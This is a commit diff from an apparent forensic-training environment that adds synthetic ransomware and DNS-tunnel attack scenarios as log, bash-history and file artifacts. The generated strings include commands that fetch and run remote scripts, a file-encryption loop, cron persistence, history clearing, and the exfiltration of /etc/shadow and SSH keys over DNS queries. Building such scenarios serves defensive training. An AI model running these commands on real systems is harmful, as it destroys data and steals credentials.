Spaces:

yashppawar
/

forensic-shell

Sleeping

App Files Files Community

yashppawar commited on 3 days ago

Commit

401c6f8

verified ·

1 Parent(s): 62567eb

Upload folder using huggingface_hub

Browse files

Files changed (2) hide show

openenv_forensic_shell.egg-info/SOURCES.txt +1 -0
server/attack_patterns.py +122 -0

openenv_forensic_shell.egg-info/SOURCES.txt CHANGED Viewed

@@ -5,6 +5,7 @@ models.py
 pyproject.toml
 ./__init__.py
 ./client.py
 ./models.py
 agents/__init__.py
 agents/llm_policy.py

 pyproject.toml
 ./__init__.py
 ./client.py
+./inference.py
 ./models.py
 agents/__init__.py
 agents/llm_policy.py

server/attack_patterns.py CHANGED Viewed

@@ -279,10 +279,132 @@ def insider(ctx):
     )
 PATTERNS = {
     "ssh_brute": ssh_brute,
     "ssh_key_theft": ssh_key_theft,
     "webshell": webshell,
     "supply_chain": supply_chain,
     "insider": insider,
 }

     )
+# ---------------------------------------------------------------------------
+# Pattern 6 — ransomware: encrypt files + drop ransom note + cron persistence
+# ---------------------------------------------------------------------------
+def ransomware(ctx):
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[2201]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[2201]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
+        f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/bash /tmp/.{ctx.short}_enc.sh",
+        f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee /etc/cron.d/{ctx.short}-check",
+    ]
+    bash = (
+        f"cd /tmp\n"
+        f"curl -sO http://{ip}/enc/{ctx.short}_enc.sh\n"
+        f"chmod +x .{ctx.short}_enc.sh\n"
+        f"sudo bash /tmp/.{ctx.short}_enc.sh\n"
+        f"echo '*/10 * * * * root /tmp/.{ctx.short}_enc.sh >/dev/null 2>&1' | sudo tee /etc/cron.d/{ctx.short}-check\n"
+        f"history -c\n"
+    )
+    ransom_note = (
+        f"=== YOUR FILES HAVE BEEN ENCRYPTED ===\n"
+        f"All .doc, .pdf, .xls files on this host have been encrypted.\n"
+        f"Send 0.5 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\n"
+        f"Contact: recovery-{ctx.short}@protonmail.com\n"
+        f"DO NOT attempt to decrypt without the key.\n"
+    )
+    enc_script = (
+        f"#!/bin/bash\n"
+        f"# {ctx.short} encryptor\n"
+        f"find /home -name '*.doc' -o -name '*.pdf' -o -name '*.xls' 2>/dev/null | "
+        f"while read f; do openssl enc -aes-256-cbc -salt -in \"$f\" -out \"$f.enc\" -pass pass:{ctx.short}; done\n"
+        f"echo 'encryption complete' | curl -s -X POST -d @- http://{ip}/status/{ctx.short}\n"
+    ).encode()
+    cron_content = f"*/10 * * * * root /tmp/.{ctx.short}_enc.sh >/dev/null 2>&1\n"
+    modified_files = {
+        f"/tmp/.{ctx.short}_enc.sh": enc_script,
+        "/home/RANSOM_NOTE.txt": ransom_note,
+        f"/etc/cron.d/{ctx.short}-check": cron_content,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"ssh from {ip}"},
+        {"phase": "recon", "detail": "find /home -name *.doc"},
+        {"phase": "privesc", "detail": "sudo bash encryption script"},
+        {"phase": "persistence", "detail": f"cron /etc/cron.d/{ctx.short}-check re-encrypts on schedule"},
+        {"phase": "exfil", "detail": f"encryption status beacon to {ip}"},
+    ]
+    return dict(
+        pattern_tag="ransomware",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=[
+            f"/tmp/.{ctx.short}_enc.sh",
+            "/home/RANSOM_NOTE.txt",
+            f"/etc/cron.d/{ctx.short}-check",
+            ctx.backdoor_path,
+        ],
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 7 — DNS tunnel: exfiltrate data via DNS TXT queries
+# ---------------------------------------------------------------------------
+def dns_tunnel(ctx):
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    tunnel_domain = f"{ctx.short}.exfil.example.com"
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[1101]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[1101]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
+        f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/apt install dnsutils",
+        f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/bash /tmp/.{ctx.short}_dns.sh",
+    ]
+    bash = (
+        f"sudo apt install -y dnsutils\n"
+        f"cat /etc/shadow | base64 | fold -w 63 | while read chunk; do dig TXT $chunk.{tunnel_domain} +short; done\n"
+        f"cat /etc/passwd | base64 | fold -w 63 | while read chunk; do dig TXT $chunk.{tunnel_domain} +short; done\n"
+        f"echo '*/5 * * * * root /tmp/.{ctx.short}_dns.sh' | sudo tee /etc/cron.d/{ctx.short}-dns\n"
+        f"history -c\n"
+    )
+    dns_script = (
+        f"#!/bin/bash\n"
+        f"# DNS tunnel exfil agent — {ctx.short}\n"
+        f"for f in /etc/shadow /etc/passwd /home/*/.ssh/id_rsa; do\n"
+        f"  [ -f \"$f\" ] && cat \"$f\" | base64 | fold -w 63 | "
+        f"while read c; do dig TXT \"$c.{tunnel_domain}\" +short 2>/dev/null; done\n"
+        f"done\n"
+    ).encode()
+    cron_content = f"*/5 * * * * root /tmp/.{ctx.short}_dns.sh >/dev/null 2>&1\n"
+    modified_files = {
+        f"/tmp/.{ctx.short}_dns.sh": dns_script,
+        f"/etc/cron.d/{ctx.short}-dns": cron_content,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"ssh from {ip}"},
+        {"phase": "recon", "detail": "cat /etc/shadow; cat /etc/passwd"},
+        {"phase": "privesc", "detail": "sudo apt install dnsutils"},
+        {"phase": "persistence", "detail": f"cron /etc/cron.d/{ctx.short}-dns runs every 5 min"},
+        {"phase": "exfil", "detail": f"base64 chunks via DNS TXT to {tunnel_domain}"},
+    ]
+    return dict(
+        pattern_tag="dns_tunnel",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=[
+            f"/tmp/.{ctx.short}_dns.sh",
+            f"/etc/cron.d/{ctx.short}-dns",
+            ctx.backdoor_path,
+        ],
+        timeline=timeline,
+    )
 PATTERNS = {
     "ssh_brute": ssh_brute,
     "ssh_key_theft": ssh_key_theft,
     "webshell": webshell,
     "supply_chain": supply_chain,
     "insider": insider,
+    "ransomware": ransomware,
+    "dns_tunnel": dns_tunnel,
 }